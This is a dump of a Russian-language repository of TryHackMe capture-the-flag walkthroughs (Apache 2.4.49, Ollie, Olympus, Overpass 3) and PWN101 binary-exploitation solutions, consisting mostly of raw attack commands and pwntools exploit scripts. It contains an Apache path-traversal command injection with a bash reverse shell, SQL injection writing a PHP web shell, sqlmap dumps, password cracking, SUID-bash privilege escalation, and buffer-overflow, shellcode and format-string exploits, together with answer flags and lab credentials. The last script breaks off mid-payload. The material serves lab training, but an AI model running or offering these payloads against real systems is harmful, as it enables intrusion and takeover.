searchsploit Apache 2.4.49 14 | https://www.exploit-db.com/exploits/50383 15 | curl -s --path-as-is -d "echo Content-Type: text/plain; echo; /etc/passwd" "http:///cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" 16 | curl 'http:///cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' --data 'echo Content-Type:text/plain; echo; bash -i >& /dev/tcp//4444 0>&1' 17 | nc -lvnp 4444 18 | ls -la 19 | ifconfig 20 | python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'’ 21 | cat /root/user.txt 22 | ``` 23 | ```commandline 24 | THM{eacffefe1d2aafcc15e70dc2f07f7ac1} 25 | ``` 26 | Что такое корневой флаг? 27 | ```commandline 28 | curl http:///nmap -o /tmp/nmap 29 | ./nmap -sSCV -p- 172.17.0.1 30 | # https://github.com/AlteredSecurity/CVE-2021-38647 31 | python3 CVE-2021-38647.py -t 172.17.0.1 -c 'whoami;pwd;id;hostname;uname -a;cat /root/root*' 32 | ``` 33 | ```commandline 34 | THM{7f147ef1f36da9ae29529890a1b6011f} 35 | ``` 36 | 37 | 38 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Ollie.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Ollie](https://tryhackme.com/r/room/ollie) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Олли Юникс Монтгомери, печально известный хакерский пес, отличный игрок в красную команду. Что касается разработки... 8 | не очень! Ходят слухи, что Олли испортил несколько файлов на сервере, чтобы обеспечить обратную совместимость. 9 | Возьмите управление, пока не истекло время! 10 | 11 | Покойся с миром 01.05.2023 12 | Пожалуйста, подождите до 3 минут, пока компьютер загрузится. 13 | 14 | ### Ответьте на вопросы ниже 15 | Что такое флаг user.txt? 16 | ```commandline 17 | nmap -sSCV 18 | nc 1337 19 | searchsploit phpipam 20 | “ union select 1,2,3,’’ into outfile ‘/var/www/html/rev.php’ -- - 21 | /bin/bash -c “bash -i >& /dev/tcp//4444 0>&1” 22 | tty shell-escape 23 | python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ 24 | ctrl+z 25 | stty raw -echo; fg 26 | export TERM=xterm 27 | su ollie 28 | cat user.txt 29 | ``` 30 | ```commandline 31 | THM{Ollie_boi_is_daH_Cut3st} 32 | ``` 33 | Что такое флаг root.txt? 34 | ```commandline 35 | find / -uid 1000 -perm -g=w -type f 2>/dev/null 36 | cat /etc/systemd/system/feedme.service 37 | echo '#!/bin/bash' > feedme 38 | echo ' /bin/bash -c "bash -i >& /dev/tcp//5555 0>&1"' >> feedme 39 | nc -nvlp 5555 40 | cat /root/root.txt 41 | ``` 42 | ```commandline 43 | THM{Ollie_Luvs_Chicken_Fries} 44 | ``` 45 | 46 | 47 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Olympus.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Olympus](https://tryhackme.com/r/room/olympusroom) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Привет! 8 | 9 | Запустите VM здесь и начните перечисление! Машине может потребоваться некоторое время для запуска. Пожалуйста, 10 | подождите до 5 минут (извините за неудобства). Брутфорс против любой страницы входа выходит за рамки и не должен 11 | использоваться. 12 | 13 | Если вы застряли, вы можете найти подсказки в моем репозитории GitHub (вы найдете их в разделе пошаговых инструкций). 14 | 15 | Ну... Удачного взлома ^^ 16 | 17 | Маленький принц 18 | 19 | ### Ответьте на вопросы ниже 20 | Запустите виртуальную машину 21 | 22 | ```commandline 23 | Ответ не нужен 24 | ``` 25 | 26 | ## Задание 2 27 | Отправьте свои флаги здесь. 28 | ### Ответьте на вопросы ниже 29 | Что такое Флаг 1? 30 | ```commandline 31 | nmap -sSCV 32 | gobuster dir -u http:/// -t 30 -w /usr/share/Seclists/Discovery/Web-Content/common.txt 33 | sqlmap -u "http:///~webmaster/search.php" --dbs --forms --tables -D olympus --dump 34 | sqlmap -u 'http:///~webmaster/category.php?cat_id=1' -p 'cat_id' -D olympus -T flag --dump 35 | # or in search 36 | 1337'union select 1,2,concat(flag),4,5,6,7,8,9,10 from olympus.flag -- - 37 | ``` 38 | ```commandline 39 | flag{Sm4rt!_k33P_d1gGIng} 40 | ``` 41 | Что такое Флаг 2? 42 | ```commandline 43 | sqlmap -u 'http:///~webmaster/category.php?cat_id=1' -p 'cat_id' -D olympus -T users -C user_name,user_password,user_email --dump 44 | john hash --wordlist=/usr/share/wordlists/rockyou.txt 45 | john --show hash 46 | prometeheus:summertime 47 | http:///~webmaster/search.php 48 | nc -lvnp 4444 49 | cat /home/zeus/user.txt 50 | ``` 51 | ```commandline 52 | flag{Y0u_G0t_TH3_l1ghtN1nG_P0w3R} 53 | ``` 54 | Что такое Флаг 3? 55 | ```commandline 56 | find / -perm -u=s -type f 2>/dev/null 57 | /usr/bin/cputils 58 | chmod 400 id_rsa 59 | ssh -i id_rsa zeus@olympus.thm 60 | ssh2john.py id_rsa > pass 61 | john pass --wordlist=/usr/share/wordlists/rockyou.txt 62 | ssh zeus@olympus.thm -i id_rsa 63 | uname -a; -w;/lib/defended/libc.so.99 64 | 65 | ``` 66 | ```commandline 67 | flag{D4mN!_Y0u_G0T_m3_:)_} 68 | ``` 69 | Что такое Флаг 4? 70 | ```commandline 71 | nc -nlvp 5555 72 | cd /etc 73 | grep -R "flag{" 74 | cat ssl/private/.b0nus.fl4g 75 | ``` 76 | ```commandline 77 | flag{Y0u_G0t_m3_g00d!} 78 | ``` 79 | 80 | 81 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/Overpass 3 - Hosting.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Overpass 3 - Hosting](https://tryhackme.com/r/room/overpass3hosting) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | После неудачного старта Overpass в сфере информационной безопасности, коммерческого провала их менеджера паролей и 8 | последующего взлома они решили попробовать себя в новом бизнесе. 9 | 10 | Overpass стал компанией веб-хостинга! 11 | К сожалению, они не извлекли уроков из своих прошлых ошибок. Ходят слухи, что их главный веб-сервер крайне уязвим. 12 | 13 | Предупреждение: Загрузка этого ящика может занять около 5 минут, если вы не являетесь подписчиком. Как подписчик, 14 | он будет готов гораздо быстрее. 15 | 16 | Я буду просматривать записи для этой комнаты, начиная с 1 недели после выпуска. До этого времени, пожалуйста, не 17 | публикуйте записи. Хранить их в нераспечатанном виде — это нормально, но, пожалуйста, не делитесь ими. 18 | 19 | Вы можете транслировать эту комнату, как только статьи будут одобрены. 20 | Изображение баннера от Nastuh Abootalebi на Unsplash 21 | 22 | ### Ответьте на вопросы ниже 23 | Веб-флаг 24 | ```commandline 25 | nmap -sSCV 26 | gobuster dir -u http:// -x php,txt,old,bak,tar,zip -w /usr/share/wordlists/dirb/common.txt 27 | wget http:///backups/backup.zip 28 | unzip backup.zip 29 | gpg --import priv.key 30 | gpg --decrypt-file CustomerDetails.xlsx.gpg 31 | ll 32 | # CustomerDetails.xlsx 33 | # paradox:ShibesAreGreat123 34 | # 0day:OllieIsTheBestDog 35 | # muirlandoracle:A11D0gsAreAw3s0me 36 | 37 | ftp 38 | paradox:ShibesAreGreat123 39 | ls -la 40 | put shell.php 41 | nc -nlvp 4444 42 | curl -s http:///shell.php 43 | find / -type f -name "*flag*" -exec ls -l {} + 2>/dev/null 44 | cat /usr/share/httpd/web.flag 45 | ``` 46 | ```commandline 47 | thm{0ae72f7870c3687129f7a824194be09d} 48 | ``` 49 | Пользовательский флаг 50 | ```commandline 51 | ls -la /home 52 | sudo -l 53 | find / -type f -user james -exec ls -l {} + 2>/dev/null 54 | rpcinfo -p | grep nfs 55 | mkdir nfs 56 | sudo mount -t nfs :/home/james nfs 57 | sshpass -p "ShibesAreGreat123" ssh paradox@ -L 2049:127.0.0.1:2049 58 | nmap -p 2049 -sC -sV 127.0.0.1 59 | sudo mount -t nfs 127.0.0.1: nfs 60 | cd nfs 61 | ll 62 | cat user.flag 63 | ``` 64 | ```commandline 65 | thm{3693fc86661faa21f16ac9508a43e1ae} 66 | ``` 67 | Корневой флаг 68 | ```commandline 69 | ls -la 70 | cp ~/.ssh/id_rsa.pub .ssh/authorized_keys 71 | ssh james@ 72 | cp /usr/bin/bash /home/james/ 73 | sudo chown root:root bash 74 | sudo chmod +s bash 75 | ll 76 | ./bash -p 77 | cat /root/root.flag 78 | ``` 79 | ```commandline 80 | thm{a4f6adb70371a4bceb32988417456c44} 81 | ``` 82 | 83 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /02.Medium/PWN101/fuzz_pwn107.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | # Allows you to switch between local/GDB/remote from terminal 5 | def start(argv=[], *a, **kw): 6 | if args.GDB: # Set GDBscript below 7 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 8 | elif args.REMOTE: # ('server', 'port') 9 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 10 | else: # Run locally 11 | return process([exe] + argv, *a, **kw) 12 | 13 | 14 | # Specify your GDB script here for debugging 15 | gdbscript = ''' 16 | init-pwndbg 17 | piebase 18 | continue 19 | '''.format(**locals()) 20 | 21 | 22 | # Set up pwntools for the correct architecture 23 | exe = './pwn107.pwn107' 24 | # This will automatically get context arch, bits, os etc 25 | elf = context.binary = ELF(exe, checksec=False) 26 | # Enable verbose logging so we can see exactly what is being sent (info/debug) 27 | context.log_level = 'warning' 28 | 29 | # =========================================================== 30 | # EXPLOIT GOES HERE 31 | # =========================================================== 32 | 33 | # Let's fuzz x values 34 | for i in range(17, 18): 35 | try: 36 | p = start() 37 | # Format the counter 38 | # e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int 39 | p.sendlineafter(b'?', '%{}$p'.format(i).encode()) 40 | # Receive the response 41 | p.recvuntil(b'Your current streak: ') 42 | result = p.recvline() 43 | print(str(i) + ': ' + str(result)) 44 | p.close() 45 | except EOFError: 46 | pass -------------------------------------------------------------------------------- /02.Medium/PWN101/fuzz_pwn108.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | # Allows you to switch between local/GDB/remote from terminal 5 | def start(argv=[], *a, **kw): 6 | if args.GDB: # Set GDBscript below 7 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 8 | elif args.REMOTE: # ('server', 'port') 9 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 10 | else: # Run locally 11 | return process([exe] + argv, *a, **kw) 12 | 13 | 14 | # Specify your GDB script here for debugging 15 | gdbscript = ''' 16 | init-pwndbg 17 | piebase 18 | continue 19 | '''.format(**locals()) 20 | 21 | 22 | # Set up pwntools for the correct architecture 23 | exe = './pwn108.pwn108' 24 | # This will automatically get context arch, bits, os etc 25 | elf = context.binary = ELF(exe, checksec=False) 26 | # Enable verbose logging so we can see exactly what is being sent (info/debug) 27 | context.log_level = 'warning' 28 | 29 | # =========================================================== 30 | # EXPLOIT GOES HERE 31 | # =========================================================== 32 | 33 | # Let's fuzz x values 34 | for i in range(1, 20): 35 | try: 36 | p = start() 37 | # Send the name value 38 | p.recvuntil('=[Your name]:') 39 | p.sendline('Pwner') 40 | # Format the counter 41 | # e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int 42 | p.sendlineafter(b':', 'AAAA%{}$p'.format(i).encode()) 43 | # Receive the response 44 | p.recvuntil(b'Register no : ') 45 | result = p.recvline() 46 | print(str(i) + ': ' + str(result)) 47 | p.close() 48 | except EOFError: 49 | pass -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn101.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | char input [60]; 5 | int check; 6 | 7 | check = 0x539; 8 | setup(); 9 | banner(); 10 | puts( 11 | "Hello!, I am going to shopping.\nMy mom told me to buy some ingredients.\nUmmm.. But I have l ow memory capacity, So I forgot most of them.\nAnyway, she is preparing Briyani for lunch, Can you help me to buy those items :D\n" 12 | ); 13 | puts("Type the required ingredients to make briyani: "); 14 | gets(input); 15 | if (check == 0x539) { 16 | puts("Nah bruh, you lied me :(\nShe did Tomato rice instead of briyani :/"); 17 | /* WARNING: Subroutine does not return */ 18 | exit(0x539); 19 | } 20 | puts("Thanks, Here\'s a small gift for you <3"); 21 | system("/bin/sh"); 22 | return; 23 | } 24 | 25 | //1. It stores a value 0x539 in the variable check 26 | //2. It prints out the banner and requires out input 27 | //3. It uses get() to receive our input #bug here 28 | //4. Does an if check to know if the value stored in variable check is equal to 0x539 29 | //5. If the condition is meet it exits 30 | //6. If it isn't meet we get shell -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn101.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Binary filename 14 | exe = './pwn101.pwn101' 15 | # This will automatically get context arch, bits, os etc 16 | elf = context.binary = ELF(exe, checksec=False) 17 | # Change logging level to help with debugging (error/warning/info/debug) 18 | context.log_level = 'info' 19 | 20 | # =========================================================== 21 | # EXPLOIT GOES HERE 22 | # =========================================================== 23 | 24 | # Start program 25 | io = start() 26 | 27 | offset = 0x3c 28 | padding = "A" * offset 29 | check = 0xdeadbeef 30 | 31 | # Build the payload 32 | payload = flat([ 33 | padding, 34 | check 35 | ]) 36 | 37 | # Send the payload 38 | io.sendline(payload) 39 | 40 | # Got Shell? 41 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn102.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | undefined input [104]; 5 | int check2; 6 | int check1; 7 | 8 | setup(); 9 | banner(); 10 | check1 = 0xbadf00d; 11 | check2 = L'\xfee1dead'; 12 | printf("I need %x to %x\nAm I right? ",0xbadf00d,L'\xfee1dead'); 13 | __isoc99_scanf(&DAT_00100b66,input); 14 | if ((check1 == 0xc0ff33) && (check2 == 0xc0d3)) { 15 | printf("Yes, I need %x to %x\n",0xc0ff33,0xc0d3); 16 | system("/bin/sh"); 17 | return; 18 | } 19 | puts("I\'m feeling dead, coz you said I need bad food :("); 20 | /* WARNING: Subroutine does not return */ 21 | exit(0x539); 22 | } 23 | 24 | //1. It stores 0xbadf00d in check1 and 0xfee1dead in check2 25 | //2. It receives our input using scanf but doesn't specify amount of bytes that should be stored in the input buffer 26 | //3. After it receives our input it does an if check to know if the value stored in check1 is equal to 0xc0ff33 and if check2 is equal to 0xc0d3 27 | //4. If the check is passed we get a shell 28 | //5. Else it exits -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn102.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Binary filename 14 | exe = './pwn102.pwn102' 15 | # This will automatically get context arch, bits, os etc 16 | elf = context.binary = ELF(exe, checksec=False) 17 | # Change logging level to help with debugging (error/warning/info/debug) 18 | context.log_level = 'info' 19 | 20 | # =========================================================== 21 | # EXPLOIT GOES HERE 22 | # =========================================================== 23 | 24 | # Start program 25 | io = start() 26 | 27 | offset = 0x68 28 | 29 | padding = b"A" * offset 30 | check2 = p32(0xc0d3) 31 | check1 = p32(0xc0ff33) 32 | 33 | payload = padding + check2 + check1 34 | 35 | # Send the payload 36 | io.sendline(payload) 37 | 38 | # Got Shell? 39 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn103.c: -------------------------------------------------------------------------------- 1 | 2 | void admins_only(void) 3 | 4 | { 5 | puts(&DAT_00403267); 6 | puts(&DAT_0040327c); 7 | system("/bin/sh"); 8 | return; 9 | } 10 | 11 | void general(void) 12 | 13 | { 14 | int iVar1; 15 | char input [32]; 16 | 17 | puts(&DAT_004023aa); 18 | puts(&DAT_004023c0); 19 | puts(&DAT_004023e8); 20 | puts(&DAT_00402418); 21 | printf("------[pwner]: "); 22 | __isoc99_scanf(&DAT_0040245c,input); 23 | iVar1 = strcmp(input,"yes"); 24 | if (iVar1 == 0) { 25 | puts(&DAT_00402463); 26 | main(); 27 | } 28 | else { 29 | puts(&DAT_0040247f); 30 | } 31 | return; 32 | } 33 | 34 | void main(void) 35 | 36 | { 37 | undefined4 local_c; 38 | 39 | setup(); 40 | banner(); 41 | puts(&DAT_00403298); 42 | puts(&DAT_004032c0); 43 | puts(&DAT_00403298); 44 | printf(&DAT_00403323); 45 | __isoc99_scanf(&DAT_00403340,&local_c); 46 | switch(local_c) { 47 | default: 48 | main(); 49 | break; 50 | case 1: 51 | announcements(); 52 | break; 53 | case 2: 54 | rules(); 55 | break; 56 | case 3: 57 | general(); 58 | break; 59 | case 4: 60 | discussion(); 61 | break; 62 | case 5: 63 | bot_cmd(); 64 | } 65 | return; 66 | } 67 | -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn103.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Binary filename 14 | exe = './pwn103.pwn103' 15 | # This will automatically get context arch, bits, os etc 16 | elf = context.binary = ELF(exe, checksec=False) 17 | # Change logging level to help with debugging (error/warning/info/debug) 18 | context.log_level = 'info' 19 | 20 | # =========================================================== 21 | # EXPLOIT GOES HERE 22 | # =========================================================== 23 | 24 | # Start program 25 | io = start() 26 | 27 | offset = 40 28 | 29 | padding = "A" * offset 30 | shell = elf.functions['admins_only'] 31 | movaps = 0x0000000000401016 # 0x0000000000401016: ret; 32 | 33 | payload = flat([ 34 | padding, 35 | movaps, 36 | shell 37 | ]) 38 | 39 | def send_payload(): 40 | io.recvuntil('Choose the channel:') 41 | io.sendline('3') 42 | io.recvuntil('------[pwner]: ') 43 | io.sendline(payload) 44 | 45 | send_payload() 46 | 47 | 48 | # Got Shell? 49 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn104.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | undefined input [80]; 5 | 6 | setup(); 7 | banner(); 8 | puts(&DAT_00402120); 9 | puts(&DAT_00402148); 10 | puts(&DAT_00402170); 11 | printf("I\'m waiting for you at %p\n",input); 12 | read(0,input,200); 13 | return; 14 | } 15 | 16 | //1. Pritns out the banner 17 | //2. Leaks an address of the start of our input buffer on the stack 18 | //3. Recieves our input and reads 200 bytes of data into a buffer that can only hold up to 80 bytes of data # bug here -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn104.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Binary filename 14 | exe = './pwn104.pwn104' 15 | # This will automatically get context arch, bits, os etc 16 | elf = context.binary = ELF(exe, checksec=False) 17 | # Change logging level to help with debugging (error/warning/info/debug) 18 | context.log_level = 'info' 19 | 20 | # =========================================================== 21 | # EXPLOIT GOES HERE 22 | # =========================================================== 23 | 24 | # Start program 25 | io = start() 26 | 27 | print(io.recvuntil("I'm waiting for you at")) 28 | leak = io.recvline() 29 | addr = int(leak.strip("\n"), 16) 30 | print('Leaked input stack address ' + hex(addr)) 31 | 32 | offset = 88 33 | shellcode = asm(shellcraft.sh()) 34 | padding = b'A' * (offset - len(shellcode)) 35 | 36 | 37 | # Build the payload 38 | payload = flat([ 39 | shellcode, 40 | padding, 41 | addr 42 | ]) 43 | 44 | # Send payload 45 | io.sendline(payload) 46 | 47 | # Got Shell? 48 | io.interactive() -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn105.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | long in_FS_OFFSET; 5 | uint num1; 6 | uint num2; 7 | uint sum; 8 | long canary; 9 | 10 | canary = *(long *)(in_FS_OFFSET + 0x28); 11 | setup(); 12 | banner(); 13 | puts("-------=[ BAD INTEGERS ]=-------"); 14 | puts("|-< Enter two numbers to add >-|\n"); 15 | printf("]>> "); 16 | __isoc99_scanf(&DAT_0010216f,&num1); 17 | printf("]>> "); 18 | __isoc99_scanf(&DAT_0010216f,&num2); 19 | sum = num2 + num1; 20 | if (((int)num1 < 0) || ((int)num2 < 0)) { 21 | printf("\n[o.O] Hmmm... that was a Good try!\n",(ulong)num1,(ulong)num2,(ulong)sum); 22 | } 23 | else if ((int)sum < 0) { 24 | printf("\n[*] C: %d",(ulong)sum); 25 | puts("\n[*] Popped Shell\n[*] Switching to interactive mode"); 26 | system("/bin/sh"); 27 | } 28 | else { 29 | printf("\n[*] ADDING %d + %d",(ulong)num1,(ulong)num2); 30 | printf("\n[*] RESULT: %d\n",(ulong)sum); 31 | } 32 | if (canary != *(long *)(in_FS_OFFSET + 0x28)) { 33 | /* WARNING: Subroutine does not return */ 34 | __stack_chk_fail(); 35 | } 36 | return; 37 | } 38 | 39 | //1. Prints out the banner 40 | //2. It receives our input and stores it in variable num1 41 | //3. It receives our input and stores it in variable num2 42 | //4. A variable is made which sums up num1 and num2 43 | //5. An if check is done to know if the num1 variable is less than zero or the num2 is leess than 0 44 | //6. If the check is meet it exits 45 | //7. Else if the sum variable is less than zero it pops a shell 46 | //8. But if non of that is meet it justs sums up our input and give its calculated value -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn105.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | # Allows you to switch between local/GDB/remote from terminal 5 | def start(argv=[], *a, **kw): 6 | if args.GDB: # Set GDBscript below 7 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 8 | elif args.REMOTE: # ('server', 'port') 9 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 10 | else: # Run locally 11 | return process([exe] + argv, *a, **kw) 12 | 13 | 14 | # Binary filename 15 | exe = './pwn105.pwn105' 16 | # This will automatically get context arch, bits, os etc 17 | elf = context.binary = ELF(exe, checksec=False) 18 | # Change logging level to help with debugging (error/warning/info/debug) 19 | context.log_level = 'info' 20 | 21 | # =========================================================== 22 | # EXPLOIT GOES HERE 23 | # =========================================================== 24 | 25 | io = start() 26 | 27 | num1 = '2147483647' 28 | num2 = '1' 29 | 30 | io.recvuntil(']>>') 31 | io.sendline(num1) 32 | 33 | io.recvuntil(']>>') 34 | io.sendline(num2) 35 | 36 | io.interactive() 37 | 38 | # python pwn105.py | python pwn105.py REMOTE 127.0.0.1 9005 -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn106.c: -------------------------------------------------------------------------------- 1 | void main(void) 2 | 3 | { 4 | long in_FS_OFFSET; 5 | char input [56]; 6 | long canary; 7 | 8 | canary = *(long *)(in_FS_OFFSET + 0x28); 9 | setup(); 10 | banner(); 11 | puts(&DAT_00102119); 12 | printf("Enter your THM username to participate in the giveaway: "); 13 | read(0,input,0x32); 14 | printf("\nThanks "); 15 | printf(input); 16 | if (canary != *(long *)(in_FS_OFFSET + 0x28)) { 17 | /* WARNING: Subroutine does not return */ 18 | __stack_chk_fail(); 19 | } 20 | return; 21 | } 22 | 23 | //1. Prints out the banner 24 | //2. It receives our input using read() and reads in 0x32 bytes which is stored in the input buffer 25 | //3. It then prints out the the value stored in input[] -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn106.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Binary filename 14 | exe = './pwn106user.pwn106-user' 15 | # This will automatically get context arch, bits, os etc 16 | elf = context.binary = ELF(exe, checksec=False) 17 | # Change logging level to help with debugging (error/warning/info/debug) 18 | context.log_level = 'info' 19 | 20 | # =========================================================== 21 | # EXPLOIT GOES HERE 22 | # =========================================================== 23 | 24 | flag = '' 25 | 26 | # Let's fuzz x values 27 | for i in range(100): 28 | try: 29 | # Connect to server 30 | io = start() 31 | # Format the counter 32 | # e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int) 33 | io.sendline('%{}$p'.format(i).encode()) 34 | # Receive the response (leaked address followed by '.' in this case) 35 | io.recvuntil(b'Thanks ') 36 | result = io.recv() 37 | if not b'nil' in result: 38 | print(str(i) + ': ' + str(result)) 39 | try: 40 | # Decode, reverse endianess and print 41 | decoded = unhex(result.strip().decode()[2:]) 42 | reversed_hex = decoded[::-1] 43 | print(str(reversed_hex)) 44 | # Build up flag 45 | flag += reversed_hex.decode() 46 | except BaseException: 47 | pass 48 | io.close() 49 | except EOFError: 50 | io.close() 51 | 52 | # Print and close 53 | info(flag) -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn107.c: -------------------------------------------------------------------------------- 1 | void get_streak(void) 2 | 3 | { 4 | long in_FS_OFFSET; 5 | long canary; 6 | 7 | canary = *(long *)(in_FS_OFFSET + 0x28); 8 | puts("This your last streak back, don\'t do this mistake again"); 9 | system("/bin/sh"); 10 | if (canary != *(long *)(in_FS_OFFSET + 0x28)) { 11 | /* WARNING: Subroutine does not return */ 12 | __stack_chk_fail(); 13 | } 14 | return; 15 | } 16 | 17 | 18 | void main(void) 19 | 20 | { 21 | long in_FS_OFFSET; 22 | char streak [32]; 23 | undefined input [24]; 24 | long canary; 25 | 26 | canary = *(long *)(in_FS_OFFSET + 0x28); 27 | setup(); 28 | banner(); 29 | puts(&DAT_00100c68); 30 | puts(&DAT_00100c88); 31 | puts("You mailed about this to THM, and they responsed back with some questions"); 32 | puts("Answer those questions and get your streak back\n"); 33 | printf("THM: What\'s your last streak? "); 34 | read(0,streak,0x14); 35 | printf("Thanks, Happy hacking!!\nYour current streak: "); 36 | printf(streak); 37 | puts("\n\n[Few days latter.... a notification pops up]\n"); 38 | puts(&DAT_00100db8); 39 | read(0,input,0x200); 40 | if (canary != *(long *)(in_FS_OFFSET + 0x28)) { 41 | /* WARNING: Subroutine does not return */ 42 | __stack_chk_fail(); 43 | } 44 | return; 45 | } 46 | 47 | //1. It recieves our input using read and stores in steak buffer 48 | //2. It prints the value stored in streak 49 | //3. It recieves our input used read and stores in input buffer 50 | //4. It exits (ret) -------------------------------------------------------------------------------- /02.Medium/PWN101/pwn107.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Allows you to switch between local/GDB/remote from terminal 4 | def start(argv=[], *a, **kw): 5 | if args.GDB: # Set GDBscript below 6 | return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) 7 | elif args.REMOTE: # ('server', 'port') 8 | return remote(sys.argv[1], sys.argv[2], *a, **kw) 9 | else: # Run locally 10 | return process([exe] + argv, *a, **kw) 11 | 12 | 13 | # Specify GDB script here (breakpoints etc) 14 | gdbscript = ''' 15 | init-pwndbg 16 | piebase 17 | continue 18 | '''.format(**locals()) 19 | 20 | # Binary filename 21 | exe = './pwn107.pwn107' 22 | # This will automatically get context arch, bits, os etc 23 | elf = context.binary = ELF(exe, checksec=False) 24 | # Change logging level to help with debugging (error/warning/info/debug) 25 | context.log_level = 'info' 26 | 27 | # =========================================================== 28 | # EXPLOIT GOES HERE 29 | # =========================================================== 30 | 31 | # Start program 32 | io = start() 33 | 34 | # Leak stack canary address & pie address 35 | stack_leak = '%13$p' 36 | pie_leak = '%19$p' 37 | io.sendlineafter(b':', stack_leak.encode() + b' ' + pie_leak.encode()) 38 | io.recvuntil(b'Your current streak: ') 39 | 40 | # Extract the two addresses from the response 41 | leak = io.recvline().decode().strip().split(' ') 42 | canary = int(leak[0], 16) 43 | leakedpie = int(leak[1], 16) 44 | info("Canary address: %#x", canary) 45 | info("Leaked Pie address: %#x", leakedpie) 46 | 47 | # Calculate pie base address 48 | elf.address = leakedpie - 0x992 49 | info("Piebase address: %#x", elf.address) 50 | 51 | offset = 24 52 | ret = 0x06fe # ret; 53 | movaps = elf.address + ret 54 | 55 | payload = flat([ 56 | 